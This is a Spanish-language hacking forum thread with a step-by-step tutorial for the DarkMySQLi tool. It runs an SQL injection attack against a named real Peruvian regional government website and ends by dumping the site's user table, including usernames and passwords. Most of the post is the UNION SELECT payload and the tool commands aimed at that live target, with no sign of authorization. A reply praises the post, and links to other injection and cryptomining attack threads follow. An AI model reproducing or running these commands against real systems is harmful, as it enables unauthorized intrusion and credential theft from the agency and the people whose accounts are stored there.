comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

SQL Inyeccion con DarkMySQLi

  • 1 Respuestas
  • 1954 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Conectado BrowserNet

  • *
  • Underc0der
  • Mensajes: 88
  • Actividad:
    0%
  • Reputación 2
  • El TioCyberPunks esta en el barco
    • Ver Perfil
  • Skype: browsernet
« en: Diciembre 07, 2016, 03:25:07 am »


DarkMySQLi es una herramienta de código abierto creada en python, que nos permite elaborar un ataque de SQL INJECTION de forma automátizada y extraer la información de las base de datos de una web.

Link de descarga : https://www.mediafire.com/?72fcrfb2mzy16mc
Vamos a la acción



El primer paso que haremos primero sera encontrar la web vulnerable en este caso utilizare la siguiente :

http://www.regionsanmartin.gob.pe/institucional/ini.php?Area='3

Ejecutaremos el siguiente comando para el testeo de la web :
 
Código: [Seleccionar]
python darkMySQLi.py -u "http://www.regionsanmartin.gob.pe/institucional/ini.php?Area=3" --findcol


como vemos nos voto la información principal para saber si es vulnerable a la Inyección DarkMySQLi  :
 
[!] darkMySQLi URL: http://www.regionsanmartin.gob.pe/institucional/ini.php?Area=3+AND+1=2+UNION+SELECT+darkc0de,darkc0de,darkc0de,darkc0de--

luego que sabemos que es vulnerable a la inyección pondremos el siguiente:

Código: [Seleccionar]
python darkMySQLi.py -u "http://www.regionsanmartin.gob.pe/institucional/ini.php?Area=3+AND+1=2+UNION+SELECT+1,2,darkc0de,4--" --full
(solo reemplazamos el numero " 3 " por " darkc0de "




Como vemos nos a votado las columnas de las base de datos clasificándolas por cada uno de ellas en sus respectivas "tablas" de manera que podamos identificarlos fácilmente los datos almacenados.

Lo que haremos a continuación sera dumpear las columnas de los usuarios:

Código: [Seleccionar]
python darkMySQLi.py -u "http://www.regionsanmartin.gob.pe/institucional/ini.php?Area=3+AND+1=2+UNION+SELECT+1,2,darkc0de,4--" --dump -D regionsanmartin_gob_pe -T usuarios -C nomb_usuario,pass,tipo_usuario


Imagen completa de usuarios



Espero les aya gustado mucho el Post, un saludo y un abrazo desde PERU"
« Última modificación: Diciembre 07, 2016, 03:26:38 am por BrowserNet »

Desconectado Dr4g0n4Y

  • *
  • Underc0der
  • Mensajes: 27
  • Actividad:
    0%
  • Reputación 1
  • El objetivo es lo imposible
    • Ver Perfil
    • Email
« Respuesta #1 en: Diciembre 07, 2016, 04:21:02 am »
Gracias Browsernet me encantan leer tus entradas, es bueno tener alternativas para este tipo de ataques, saludos hasta Perú desde México

Enviado desde mi HTC One mediante Tapatalk


 

¿Te gustó el post? COMPARTILO!



Inyección SQL vía "Sqlmap".

Iniciado por Z3N

Respuestas: 7
Vistas: 4598
Último mensaje Julio 31, 2014, 02:00:51 pm
por DRAKONE
[VMInjector] Inyección DLL herramienta para desbloquear máquinas virtuales

Iniciado por Aryenal.Bt

Respuestas: 1
Vistas: 2580
Último mensaje Noviembre 30, 2012, 09:43:40 pm
por alexander1712
CoffeeMiner: Automatiza la inyección de código para minar en redes Wi-Fi

Iniciado por K A I L

Respuestas: 4
Vistas: 4197
Último mensaje Mayo 28, 2018, 02:52:03 pm
por GonzaaFonseca